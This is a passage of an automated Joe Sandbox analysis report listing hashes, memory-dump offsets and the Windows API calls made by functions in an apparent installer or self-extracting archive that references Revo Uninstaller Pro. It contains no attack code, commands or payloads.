                                                                                                                                              • Instruction ID: a4c86601f220200adbd5bad3958e076329161c06160e48acc52b241b6191aec9
                                                                                                                                              • Opcode Fuzzy Hash: 874ee266fe5d118a76b3a46f2e7d535f145951547ad629c7be01ea1521d86d67
                                                                                                                                              • Instruction Fuzzy Hash: 90A012C51BD005BC300911806C06C76430FC0C4FA5370C529F50180045548049500031
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD217
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: ede1d2f9824017921c6c2916e16c825b1a8ae757e793eabfeb7db9928ffff349
                                                                                                                                              • Instruction ID: a4c86601f220200adbd5bad3958e076329161c06160e48acc52b241b6191aec9
                                                                                                                                              • Opcode Fuzzy Hash: ede1d2f9824017921c6c2916e16c825b1a8ae757e793eabfeb7db9928ffff349
                                                                                                                                              • Instruction Fuzzy Hash: 90A012C51BD005BC300911806C06C76430FC0C4FA5370C529F50180045548049500031
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD217
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: aebd30815698f674a13788123a77fa2f0c874a4d4b646048d56c45b3d4a87583
                                                                                                                                              • Instruction ID: 9bc62528c9233ce6e1e4fcd2986b8bdef79d065231186b63772540150766cf55
                                                                                                                                              • Opcode Fuzzy Hash: aebd30815698f674a13788123a77fa2f0c874a4d4b646048d56c45b3d4a87583
                                                                                                                                              • Instruction Fuzzy Hash: CFA012C51BD0047C300911806C06C76430FC0C0F65370C129F50080049548049500031
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: 38757f3f595198cbddf4b1324f1bab995801f0d6dff03976c47c3c90c04a7032
                                                                                                                                              • Instruction ID: 8c07b26ff6877387de08ea24ee0d8a91be9b859d422d041ae942d06b8e525887
                                                                                                                                              • Opcode Fuzzy Hash: 38757f3f595198cbddf4b1324f1bab995801f0d6dff03976c47c3c90c04a7032
                                                                                                                                              • Instruction Fuzzy Hash: 0EA0128167D005BC310931406C02C77420FC0C4B95370C429F10980040548108500031
                                                                                                                                              APIs
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,002F9CE4,C:\Program Files\VS Revo Group\Revo Uninstaller Pro,00000000,003285FA,00000006), ref: 002F9A91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
• Opcode ID: 60bce42db1c2ebea2501ae43f3480328dfe89863b48fac5eaae317778c7f4843
• Instruction ID: 4407a2cc0aa46c431f997b108482945eef448b8345154e081cef70b57b0a8823
• Opcode Fuzzy Hash: 60bce42db1c2ebea2501ae43f3480328dfe89863b48fac5eaae317778c7f4843
• Instruction Fuzzy Hash: F1A01230194006568A014B30CC09C1676555760702F00C6307102C00A0CB308820A500
APIs
• CloseHandle.KERNEL32(000000FF,?,?,002E94AA), ref: 002E94F5
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 77ee036059f4c076a0a10f49b988278d9ac78f6b396bf474c7b6b45e33cb474d
• Instruction ID: ef69a67c03254bfa13829d73e213c9f5742fb353eed13f2d773328c599df5208
• Opcode Fuzzy Hash: 77ee036059f4c076a0a10f49b988278d9ac78f6b396bf474c7b6b45e33cb474d
• Instruction Fuzzy Hash: 4FF0BE704A2B814EEB328E25C508B92B3E89B12730F848B1F80E6435E0D371A8AD8B00
APIs
  • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
  • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
• SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 002FB04A
• EndDialog.USER32(?,00000006), ref: 002FB05D
• GetDlgItem.USER32(?,0000006C), ref: 002FB079
• SetFocus.USER32(00000000), ref: 002FB080
• SetDlgItemTextW.USER32(?,00000065,?), ref: 002FB0C0
• SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 002FB0F3
• FindFirstFileW.KERNEL32(?,?), ref: 002FB109
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002FB127
• FileTimeToSystemTime.KERNEL32(?,?), ref: 002FB137
• GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 002FB154
• GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 002FB172
• _swprintf.LIBCMT ref: 002FB1A2
  • Part of subcall function 002E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E3E54
• SetDlgItemTextW.USER32(?,0000006A,?), ref: 002FB1B5
• FindClose.KERNEL32(00000000), ref: 002FB1B8
• _swprintf.LIBCMT ref: 002FB213
• SetDlgItemTextW.USER32(?,00000068,?), ref: 002FB226
• SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 002FB23C
• FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 002FB25C
• FileTimeToSystemTime.KERNEL32(?,?), ref: 002FB26C
• GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 002FB286
• GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 002FB29E
• _swprintf.LIBCMT ref: 002FB2CF
• SetDlgItemTextW.USER32(?,0000006B,?), ref: 002FB2E2
• _swprintf.LIBCMT ref: 002FB332
• SetDlgItemTextW.USER32(?,00000069,?), ref: 002FB345
  • Part of subcall function 002F9D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 002F9DBF
  • Part of subcall function 002F9D99: GetNumberFormatW.KERNEL32(00000400,00000000,?,0031D600,?,?), ref: 002F9E0E
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
• String ID: %s %s$%s %s %s$REPLACEFILEDLG
• API String ID: 797121971-1840816070
• Opcode ID: 3b3a6e846182970289e6e0e926955a7e740a09cc8ceea010675a565b70f36023
• Instruction ID: 38dd52c8c65123d9dfe41c1a367f8fdc3f41e4dd026d1d234abacff709989cf3
• Opcode Fuzzy Hash: 3b3a6e846182970289e6e0e926955a7e740a09cc8ceea010675a565b70f36023
• Instruction Fuzzy Hash: 2A91C572258349BBD232DBA0CD49FFBB7ACEB4E740F044829F745D2081DB71A6158B62
APIs
• __EH_prolog.LIBCMT ref: 002E6FCB
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 002E712B
• CloseHandle.KERNEL32(00000000), ref: 002E713B
  • Part of subcall function 002E7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 002E7A24
  • Part of subcall function 002E7A15: GetLastError.KERNEL32 ref: 002E7A6A
  • Part of subcall function 002E7A15: CloseHandle.KERNEL32(?), ref: 002E7A79
• CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 002E7146
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 002E7254
• DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 002E7280
• CloseHandle.KERNEL32(?), ref: 002E7292
• GetLastError.KERNEL32(00000015,00000000,?), ref: 002E72A2
• RemoveDirectoryW.KERNEL32(?), ref: 002E72EE
• DeleteFileW.KERNEL32(?), ref: 002E7316
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 3935142422-3508440684
• Opcode ID: 41dfbc80b0c25e39372646784615690bc9f33dfdf6d6720c1faed62a8a76769c
• Instruction ID: 8542ef5018ca1724d1debe75db36301becf2c720bb4b1f3c9acc62c19c5e9043
• Opcode Fuzzy Hash: 41dfbc80b0c25e39372646784615690bc9f33dfdf6d6720c1faed62a8a76769c
• Instruction Fuzzy Hash: 97B103719542999FEB26DF65CC41BEF73B8EF08300F4044A9FA19E7182D770AA65CB60
APIs
• FindResourceW.KERNEL32(00000066,PNG,?,?,002FA54A,00000066), ref: 002F964B
• SizeofResource.KERNEL32(00000000,75845780,?,?,002FA54A,00000066), ref: 002F9663
• LoadResource.KERNEL32(00000000,?,?,002FA54A,00000066), ref: 002F9676
• LockResource.KERNEL32(00000000,?,?,002FA54A,00000066), ref: 002F9681
• GlobalAlloc.KERNEL32(00000002,00000000,00000000,?,?,?,002FA54A,00000066), ref: 002F969F
• GlobalLock.KERNEL32(00000000), ref: 002F96AC
• GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 002F9707
• GlobalUnlock.KERNEL32(00000000), ref: 002F971C
• GlobalFree.KERNEL32(00000000), ref: 002F9723
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
• String ID: PNG
• API String ID: 4097654274-364855578
• Opcode ID: f79477b759d74d048031182314b473a53b13df5a3ecd109ef21d148cb605c107
• Instruction ID: 6265d4c8d0a17fcbf7872c2a16d6db944029d9af623824addb1e4b32304cd2cd
• Opcode Fuzzy Hash: f79477b759d74d048031182314b473a53b13df5a3ecd109ef21d148cb605c107
• Instruction Fuzzy Hash: 6B217F7152030AABD7269F21DC88E7BFBADEF49790B11453CFA41C2161DB21C864CAA1
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00307CD9
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00307CE3
• UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00307CF0
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID: S#~>
• API String ID: 3906539128-2989149754
• Opcode ID: e1ca0c0fa41f98a2164bcec0212de464b49fc7485c42e34876a0fec480a6349f
• Instruction ID: e9d3388fd8b2ca9c5ac1d5b4f5dc5e2b3b336f5a50779fc25dcbba5da4457cbc
• Opcode Fuzzy Hash: e1ca0c0fa41f98a2164bcec0212de464b49fc7485c42e34876a0fec480a6349f
• Instruction Fuzzy Hash: 3231B374D1121CABCF62DF64D889BDDBBB8AF18310F5041EAE51CA72A0E7709B918F44
                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: .$S#~>
                                                                                                                                              • API String ID: 0-726359303
                                                                                                                                              APIs
                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 002F9DBF
                                                                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0031D600,?,?), ref: 002F9E0E
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2169056816-0
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(002F0DE0,?,00000200), ref: 002E6D06
                                                                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 002E6D27
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                              APIs
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001E64F,002FE084), ref: 002FE648
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HeapProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002FB4CC
                                                                                                                                                • Part of subcall function 002FA156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 002FA21E
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,002FADDF,?,00000000), ref: 002FB601
                                                                                                                                              • SHFileOperationW.SHELL32(?), ref: 002FB6AE
                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 002FB6BB
                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 002FB6C9
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 002FB812
                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 002FB99C
                                                                                                                                              • GetDlgItem.USER32(?,00000066), ref: 002FB9D7
                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 002FB9E7
                                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,00329602), ref: 002FB9FB
                                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002FBA24
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemOperationStrings_wcsrchr
                                                                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                              • API String ID: 764735972-312220925
                                                                                                                                              APIs
                                                                                                                                              • _swprintf.LIBCMT ref: 002ED731
                                                                                                                                                • Part of subcall function 002E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E3E54
                                                                                                                                                • Part of subcall function 002F11FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00320078,?,002ECE91,00000000,?,00000050,00320078), ref: 002F1217
                                                                                                                                              • _strlen.LIBCMT ref: 002ED752
                                                                                                                                              • SetDlgItemTextW.USER32(?,0031D154,?), ref: 002ED7B2
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 002ED7EC
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 002ED7F8
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 002ED896
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 002ED8C3
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 002ED906
                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 002ED90E
                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 002ED919
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 002ED946
                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 002ED9B8
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                              • String ID: I=u$$%s:$CAPTION$d
                                                                                                                                              • API String ID: 2407758923-1991495195
                                                                                                                                              • Opcode ID: 987e4e7530749a85ca12463423b9c4157b49eaa2b50c6fc534efa367ec6febaf
                                                                                                                                              • Instruction ID: 9043b229f4d016af959a18e976ae83217928bf5449775a51d56dcebc81c433f5
                                                                                                                                              • Opcode Fuzzy Hash: 987e4e7530749a85ca12463423b9c4157b49eaa2b50c6fc534efa367ec6febaf
                                                                                                                                              • Instruction Fuzzy Hash: C081F072148341AFD711DF69CC88FAFBBE9EB89704F44482DFA8597290C630E9168B52
APIs
• ___free_lconv_mon.LIBCMT ref: 0030B7C8
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B380
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B392
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B3A4
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B3B6
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B3C8
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B3DA
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B3EC
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B3FE
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B410
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B422
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B434
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B446
  • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B458
• _free.LIBCMT ref: 0030B7BD
  • Part of subcall function 00307A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?), ref: 00307A66
  • Part of subcall function 00307A50: GetLastError.KERNEL32(?,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?,?), ref: 00307A78
• _free.LIBCMT ref: 0030B7DF
• _free.LIBCMT ref: 0030B7F4
• _free.LIBCMT ref: 0030B7FF
• _free.LIBCMT ref: 0030B821
• _free.LIBCMT ref: 0030B834
• _free.LIBCMT ref: 0030B842
• _free.LIBCMT ref: 0030B84D
• _free.LIBCMT ref: 0030B885
• _free.LIBCMT ref: 0030B88C
• _free.LIBCMT ref: 0030B8A9
• _free.LIBCMT ref: 0030B8C1
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: dd6cc4e16406af0c5f39734a98075dbaa232dee0f4c872d92bb008f638473aae
• Instruction ID: 1575b3935b4599ff7b60c35f98ef49ddd565d14030ec8c9bdc5178cfbb55dc8b
• Opcode Fuzzy Hash: dd6cc4e16406af0c5f39734a98075dbaa232dee0f4c872d92bb008f638473aae
• Instruction Fuzzy Hash: A0315E31A063419FEB22AA39D855B5BB3F8EF00350F159429E059EB2E1DF30FD808724
APIs
• _free.LIBCMT ref: 00308436
  • Part of subcall function 00307A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?), ref: 00307A66
  • Part of subcall function 00307A50: GetLastError.KERNEL32(?,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?,?), ref: 00307A78
• _free.LIBCMT ref: 00308442
• _free.LIBCMT ref: 0030844D
• _free.LIBCMT ref: 00308458
• _free.LIBCMT ref: 00308463
• _free.LIBCMT ref: 0030846E
• _free.LIBCMT ref: 00308479
• _free.LIBCMT ref: 00308484
• _free.LIBCMT ref: 0030848F
• _free.LIBCMT ref: 0030849D
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
